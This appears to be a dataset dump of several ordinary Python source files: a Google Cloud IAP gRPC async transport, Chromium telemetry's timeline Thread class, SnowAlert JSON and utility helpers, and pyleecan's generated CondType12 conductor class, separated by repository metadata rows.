# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'update_iap_settings' not in self._stubs:
self._stubs['update_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/UpdateIapSettings',
request_serializer=service.UpdateIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['update_iap_settings']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IdentityAwareProxyAdminServiceGrpcAsyncIOTransport',
)
| 46.360743 | 98 | 0.639318 | import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 from google.api_core import grpc_helpers_async from google.auth import credentials as ga_credentials from google.auth.transport.grpc import SslCredentials import packaging.version
import grpc
from grpc.experimental import aio
from google.cloud.iap_v1.types import service
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from .base import IdentityAwareProxyAdminServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import IdentityAwareProxyAdminServiceGrpcTransport
class IdentityAwareProxyAdminServiceGrpcAsyncIOTransport(IdentityAwareProxyAdminServiceTransport):
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iap.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
credentials = False
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
return self._grpc_channel
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
if 'set_iam_policy' not in self._stubs:
self._stubs['set_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/SetIamPolicy',
request_serializer=iam_policy_pb2.SetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['set_iam_policy']
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Awaitable[policy_pb2.Policy]]:
if 'get_iam_policy' not in self._stubs:
self._stubs['get_iam_policy'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIamPolicy',
request_serializer=iam_policy_pb2.GetIamPolicyRequest.SerializeToString,
response_deserializer=policy_pb2.Policy.FromString,
)
return self._stubs['get_iam_policy']
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]]:
if 'test_iam_permissions' not in self._stubs:
self._stubs['test_iam_permissions'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/TestIamPermissions',
request_serializer=iam_policy_pb2.TestIamPermissionsRequest.SerializeToString,
response_deserializer=iam_policy_pb2.TestIamPermissionsResponse.FromString,
)
return self._stubs['test_iam_permissions']
@property
def get_iap_settings(self) -> Callable[
[service.GetIapSettingsRequest],
Awaitable[service.IapSettings]]:
if 'get_iap_settings' not in self._stubs:
self._stubs['get_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/GetIapSettings',
request_serializer=service.GetIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['get_iap_settings']
@property
def update_iap_settings(self) -> Callable[
[service.UpdateIapSettingsRequest],
Awaitable[service.IapSettings]]:
if 'update_iap_settings' not in self._stubs:
self._stubs['update_iap_settings'] = self.grpc_channel.unary_unary(
'/google.cloud.iap.v1.IdentityAwareProxyAdminService/UpdateIapSettings',
request_serializer=service.UpdateIapSettingsRequest.serialize,
response_deserializer=service.IapSettings.deserialize,
)
return self._stubs['update_iap_settings']
def close(self):
return self.grpc_channel.close()
__all__ = (
'IdentityAwareProxyAdminServiceGrpcAsyncIOTransport',
)
| true | true |
1c4a6da9e32f2fa4fbbdec55c0b23a5795f8a579 | 9,407 | py | Python | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2019-11-28T10:46:52.000Z | 2019-11-28T10:46:52.000Z | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | tools/telemetry/telemetry/timeline/thread.py | kjthegod/chromium | cf940f7f418436b77e15b1ea23e6fa100ca1c91a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2015-03-27T11:15:39.000Z | 2016-08-17T14:19:56.000Z | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
''' A Thread stores all the trace events collected for a particular
thread. We organize the synchronous slices on a thread by "subrows," where
subrow 0 has all the root slices, subrow 1 those nested 1 deep, and so on.
The asynchronous slices are stored in an AsyncSliceGroup object.
'''
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
# State only valid during import.
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
return len(self._open_slices)
def IterChildContainers(self):
return
yield # pylint: disable=W0101
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(self,
category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
"""Opens a new slice for the thread.
Calls to beginSlice and endSlice must be made with
    monotonically non-decreasing timestamps.
* category: Category to which the slice belongs.
* name: Name of the slice to add.
    * timestamp: The timestamp of the slice, in milliseconds.
    * thread_timestamp: Thread specific clock (scheduled) timestamp of the
      slice, in milliseconds.
    * args: Arguments associated with the slice.
Returns newly opened slice
"""
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
""" Ends the last begun slice in this group and pushes it onto the slice
array.
* end_timestamp: Timestamp when the slice ended in milliseconds
* end_thread_timestamp: Timestamp when the scheduled time of the slice ended
in milliseconds
returns completed slice.
"""
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
if end_thread_timestamp != None:
if curr_slice.thread_start == None:
raise ValueError(
'EndSlice with thread_timestamp called on open slice without ' +
'thread_timestamp')
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration == None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
'''This function works by walking through slices by start time.
The basic idea here is to insert each slice as deep into the subrow
list as it can go such that every subslice is fully contained by its
parent slice.
Visually, if we start with this:
0: [ a ]
1: [ b ]
2: [c][d]
To place this slice:
[e]
    We first check row 2's last item, [d]. [e] won't fit into [d] (they don't
    even intersect). So we go to row 1. That gives us [b], and [e] won't fit
    into that either. So, we go to row 0 and its last slice, [a]. That can
completely contain [e], so that means we should add [e] as a subslice
of [a]. That puts it on row 1, yielding:
0: [ a ]
1: [ b ][e]
2: [c][d]
If we then get this slice:
[f]
We do the same deepest-to-shallowest walk of the subrows trying to fit
it. This time, it doesn't fit in any open slice. So, we simply append
it to row 0 (a root slice):
0: [ a ] [f]
1: [ b ][e]
'''
def CompareSlices(s1, s2):
if s1.start == s2.start:
# Break ties by having the slice with the greatest
# end timestamp come first.
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
    ''' Adds a child slice to a root slice at its proper row.
Return False if the child slice is not in the bounds
of the root slice.
Because we know that the start time of child is >= the start time
of all other slices seen so far, we can just check the last slice
of each row for bounding.
'''
# The source trace data is in microseconds but we store it as milliseconds
# in floating-point. Since we can't represent micros as millis perfectly,
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
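# A minimal usage sketch (not part of the original module; it assumes any
# object is accepted as the `process` parent, which a real importer would
# supply as a telemetry Process):
if __name__ == '__main__':
  class _FakeProcess(object):  # hypothetical stand-in for a real Process
    pass
  demo_thread = Thread(_FakeProcess(), tid=1)
  demo_thread.BeginSlice('cat', 'outer', 0.0)
  demo_thread.BeginSlice('cat', 'inner', 1.0)
  demo_thread.EndSlice(2.0)  # closes 'inner'
  demo_thread.EndSlice(3.0)  # closes 'outer'
  demo_thread.FinalizeImport()
  assert len(demo_thread.toplevel_slices) == 1  # 'inner' nests under 'outer'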
| 35.90458 | 80 | 0.672691 | import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
return len(self._open_slices)
def IterChildContainers(self):
return
yield
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(self,
category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
if end_thread_timestamp != None:
if curr_slice.thread_start == None:
raise ValueError(
'EndSlice with thread_timestamp called on open slice without ' +
'thread_timestamp')
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration == None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
def CompareSlices(s1, s2):
if s1.start == s2.start:
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
| true | true |
1c4a6de9d76149804cfadbfe3dc687ed9ec8343a | 1,570 | py | Python | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | src/runners/utils.py | timfletch/SnowAlert | 7736ae4e7e1c8d3d4be34f8e360eddea53c49d2c | [
"Apache-2.0"
] | null | null | null | from datetime import date, datetime
import inspect
from itertools import zip_longest
import json
import traceback
from types import GeneratorType
NO_FILL = object()
def groups_of(n, iterable, fillvalue=NO_FILL):
args = [iter(iterable)] * n
rets = zip_longest(*args, fillvalue=fillvalue)
return (tuple(l for l in ret if l is not NO_FILL) for ret in rets)
def format_exception(e):
return ''.join(traceback.format_exception(type(e), e, e.__traceback__))
def format_exception_only(e):
return ''.join(traceback.format_exception_only(type(e), e)).strip()
def json_dumps(obj):
def default_json_dumps(x):
if isinstance(x, Exception):
return {
"traceback": format_exception(x),
"exception": format_exception_only(x),
"exceptionName": x.__class__.__name__,
"exceptionArgs": x.args,
}
if isinstance(x, (date, datetime)):
return x.isoformat()
if hasattr(x, 'raw'):
return default_json_dumps(x.raw)
if callable(getattr(x, 'to_json', None)):
            return json.loads(x.to_json())
if type(x) is GeneratorType:
return list(x)
return repr(x)
return json.dumps(obj, default=default_json_dumps)
def apply_some(f, **kwargs):
spec = inspect.getfullargspec(f)
defaults = dict(zip(reversed(spec.args), reversed(spec.defaults or ())))
passed_in = {arg: kwargs[arg] for arg in spec.args if arg in kwargs}
defaults.update(passed_in)
return f(**defaults)
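# Illustrative self-checks (an assumption-laden sketch, not part of the
# runners' public API; runs only when executed as a script):
if __name__ == '__main__':
    assert list(groups_of(2, 'abcde')) == [('a', 'b'), ('c', 'd'), ('e',)]
    assert json_dumps({'when': date(2020, 1, 1)}) == '{"when": "2020-01-01"}'
    assert '"exceptionName": "ValueError"' in json_dumps(ValueError('boom'))
    assert apply_some(lambda a, b=2: a + b, a=1, c=3) == 3  # extra kwarg 'c' is dropped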
| 27.068966 | 76 | 0.642675 | from datetime import date, datetime
import inspect
from itertools import zip_longest
import json
import traceback
from types import GeneratorType
NO_FILL = object()
def groups_of(n, iterable, fillvalue=NO_FILL):
args = [iter(iterable)] * n
rets = zip_longest(*args, fillvalue=fillvalue)
return (tuple(l for l in ret if l is not NO_FILL) for ret in rets)
def format_exception(e):
return ''.join(traceback.format_exception(type(e), e, e.__traceback__))
def format_exception_only(e):
return ''.join(traceback.format_exception_only(type(e), e)).strip()
def json_dumps(obj):
def default_json_dumps(x):
if isinstance(x, Exception):
return {
"traceback": format_exception(x),
"exception": format_exception_only(x),
"exceptionName": x.__class__.__name__,
"exceptionArgs": x.args,
}
if isinstance(x, (date, datetime)):
return x.isoformat()
if hasattr(x, 'raw'):
return default_json_dumps(x.raw)
if callable(getattr(x, 'to_json', None)):
            return json.loads(x.to_json())
if type(x) is GeneratorType:
return list(x)
return repr(x)
return json.dumps(obj, default=default_json_dumps)
def apply_some(f, **kwargs):
spec = inspect.getfullargspec(f)
defaults = dict(zip(reversed(spec.args), reversed(spec.defaults or ())))
passed_in = {arg: kwargs[arg] for arg in spec.args if arg in kwargs}
defaults.update(passed_in)
return f(**defaults)
| true | true |
1c4a7040f025b55e78f539572f49045fceb53255 | 11,790 | py | Python | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | pyleecan/Classes/CondType12.py | jgdedamas/pyleecan | 52ca00b36bbf1a1ba24ae722cf72c5e8e8e16395 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# File generated according to Generator/ClassesRef/Machine/CondType12.csv
# WARNING! All changes made in this file will be lost!
"""Method code available at https://github.com/Eomys/pyleecan/tree/master/pyleecan/Methods/Machine/CondType12
"""
from os import linesep
from sys import getsizeof
from logging import getLogger
from ._check import check_var, raise_
from ..Functions.get_logger import get_logger
from ..Functions.save import save
from ..Functions.copy import copy
from ..Functions.load import load_init_dict
from ..Functions.Load.import_class import import_class
from .Conductor import Conductor
# Import all class method
# Try/catch to remove unnecessary dependencies in unused method
try:
from ..Methods.Machine.CondType12.check import check
except ImportError as error:
check = error
try:
from ..Methods.Machine.CondType12.comp_surface_active import comp_surface_active
except ImportError as error:
comp_surface_active = error
try:
from ..Methods.Machine.CondType12.comp_height import comp_height
except ImportError as error:
comp_height = error
try:
from ..Methods.Machine.CondType12.comp_surface import comp_surface
except ImportError as error:
comp_surface = error
try:
from ..Methods.Machine.CondType12.comp_width import comp_width
except ImportError as error:
comp_width = error
try:
from ..Methods.Machine.CondType12.plot import plot
except ImportError as error:
plot = error
try:
from ..Methods.Machine.CondType12.plot_schematics import plot_schematics
except ImportError as error:
plot_schematics = error
from ._check import InitUnKnowClassError
from .Material import Material
class CondType12(Conductor):
"""parallel stranded conductor consisting of at least a single round wire"""
VERSION = 1
# Check ImportError to remove unnecessary dependencies in unused method
# cf Methods.Machine.CondType12.check
if isinstance(check, ImportError):
check = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method check: " + str(check))
)
)
else:
check = check
# cf Methods.Machine.CondType12.comp_surface_active
if isinstance(comp_surface_active, ImportError):
comp_surface_active = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface_active: "
+ str(comp_surface_active)
)
)
)
else:
comp_surface_active = comp_surface_active
# cf Methods.Machine.CondType12.comp_height
if isinstance(comp_height, ImportError):
comp_height = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_height: " + str(comp_height)
)
)
)
else:
comp_height = comp_height
# cf Methods.Machine.CondType12.comp_surface
if isinstance(comp_surface, ImportError):
comp_surface = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_surface: " + str(comp_surface)
)
)
)
else:
comp_surface = comp_surface
# cf Methods.Machine.CondType12.comp_width
if isinstance(comp_width, ImportError):
comp_width = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method comp_width: " + str(comp_width)
)
)
)
else:
comp_width = comp_width
# cf Methods.Machine.CondType12.plot
if isinstance(plot, ImportError):
plot = property(
fget=lambda x: raise_(
ImportError("Can't use CondType12 method plot: " + str(plot))
)
)
else:
plot = plot
# cf Methods.Machine.CondType12.plot_schematics
if isinstance(plot_schematics, ImportError):
plot_schematics = property(
fget=lambda x: raise_(
ImportError(
"Can't use CondType12 method plot_schematics: "
+ str(plot_schematics)
)
)
)
else:
plot_schematics = plot_schematics
# save and copy methods are available in all object
save = save
copy = copy
# get_logger method is available in all object
get_logger = get_logger
def __init__(
self,
Wwire=0.015,
Wins_cond=0.015,
Nwppc=1,
Wins_wire=0,
Kwoh=0.5,
cond_mat=-1,
ins_mat=-1,
init_dict=None,
init_str=None,
):
"""Constructor of the class. Can be use in three ways :
- __init__ (arg1 = 1, arg3 = 5) every parameters have name and default values
for pyleecan type, -1 will call the default constructor
- __init__ (init_dict = d) d must be a dictionnary with property names as keys
- __init__ (init_str = s) s must be a string
s is the file path to load
ndarray or list can be given for Vector and Matrix
object or dict can be given for pyleecan Object"""
if init_str is not None: # Load from a file
init_dict = load_init_dict(init_str)[1]
if init_dict is not None: # Initialisation by dict
assert type(init_dict) is dict
# Overwrite default value with init_dict content
if "Wwire" in list(init_dict.keys()):
Wwire = init_dict["Wwire"]
if "Wins_cond" in list(init_dict.keys()):
Wins_cond = init_dict["Wins_cond"]
if "Nwppc" in list(init_dict.keys()):
Nwppc = init_dict["Nwppc"]
if "Wins_wire" in list(init_dict.keys()):
Wins_wire = init_dict["Wins_wire"]
if "Kwoh" in list(init_dict.keys()):
Kwoh = init_dict["Kwoh"]
if "cond_mat" in list(init_dict.keys()):
cond_mat = init_dict["cond_mat"]
if "ins_mat" in list(init_dict.keys()):
ins_mat = init_dict["ins_mat"]
# Set the properties (value check and convertion are done in setter)
self.Wwire = Wwire
self.Wins_cond = Wins_cond
self.Nwppc = Nwppc
self.Wins_wire = Wins_wire
self.Kwoh = Kwoh
# Call Conductor init
super(CondType12, self).__init__(cond_mat=cond_mat, ins_mat=ins_mat)
# The class is frozen (in Conductor init), for now it's impossible to
# add new properties
def __str__(self):
"""Convert this object in a readeable string (for print)"""
CondType12_str = ""
# Get the properties inherited from Conductor
CondType12_str += super(CondType12, self).__str__()
CondType12_str += "Wwire = " + str(self.Wwire) + linesep
CondType12_str += "Wins_cond = " + str(self.Wins_cond) + linesep
CondType12_str += "Nwppc = " + str(self.Nwppc) + linesep
CondType12_str += "Wins_wire = " + str(self.Wins_wire) + linesep
CondType12_str += "Kwoh = " + str(self.Kwoh) + linesep
return CondType12_str
def __eq__(self, other):
"""Compare two objects (skip parent)"""
if type(other) != type(self):
return False
# Check the properties inherited from Conductor
if not super(CondType12, self).__eq__(other):
return False
if other.Wwire != self.Wwire:
return False
if other.Wins_cond != self.Wins_cond:
return False
if other.Nwppc != self.Nwppc:
return False
if other.Wins_wire != self.Wins_wire:
return False
if other.Kwoh != self.Kwoh:
return False
return True
def __sizeof__(self):
"""Return the size in memory of the object (including all subobject)"""
S = 0 # Full size of the object
# Get size of the properties inherited from Conductor
S += super(CondType12, self).__sizeof__()
S += getsizeof(self.Wwire)
S += getsizeof(self.Wins_cond)
S += getsizeof(self.Nwppc)
S += getsizeof(self.Wins_wire)
S += getsizeof(self.Kwoh)
return S
def as_dict(self):
"""Convert this object in a json seriable dict (can be use in __init__)"""
# Get the properties inherited from Conductor
CondType12_dict = super(CondType12, self).as_dict()
CondType12_dict["Wwire"] = self.Wwire
CondType12_dict["Wins_cond"] = self.Wins_cond
CondType12_dict["Nwppc"] = self.Nwppc
CondType12_dict["Wins_wire"] = self.Wins_wire
CondType12_dict["Kwoh"] = self.Kwoh
# The class name is added to the dict for deserialisation purpose
# Overwrite the mother class name
CondType12_dict["__class__"] = "CondType12"
return CondType12_dict
def _set_None(self):
"""Set all the properties to None (except pyleecan object)"""
self.Wwire = None
self.Wins_cond = None
self.Nwppc = None
self.Wins_wire = None
self.Kwoh = None
# Set to None the properties inherited from Conductor
super(CondType12, self)._set_None()
def _get_Wwire(self):
"""getter of Wwire"""
return self._Wwire
def _set_Wwire(self, value):
"""setter of Wwire"""
check_var("Wwire", value, "float", Vmin=0)
self._Wwire = value
Wwire = property(
fget=_get_Wwire,
fset=_set_Wwire,
doc=u"""cf schematics, single wire diameter without insulation [m]
:Type: float
:min: 0
""",
)
def _get_Wins_cond(self):
"""getter of Wins_cond"""
return self._Wins_cond
def _set_Wins_cond(self, value):
"""setter of Wins_cond"""
check_var("Wins_cond", value, "float", Vmin=0)
self._Wins_cond = value
Wins_cond = property(
fget=_get_Wins_cond,
fset=_set_Wins_cond,
doc=u"""(advanced) cf schematics, winding coil insulation diameter [m]
:Type: float
:min: 0
""",
)
def _get_Nwppc(self):
"""getter of Nwppc"""
return self._Nwppc
def _set_Nwppc(self, value):
"""setter of Nwppc"""
check_var("Nwppc", value, "int", Vmin=1)
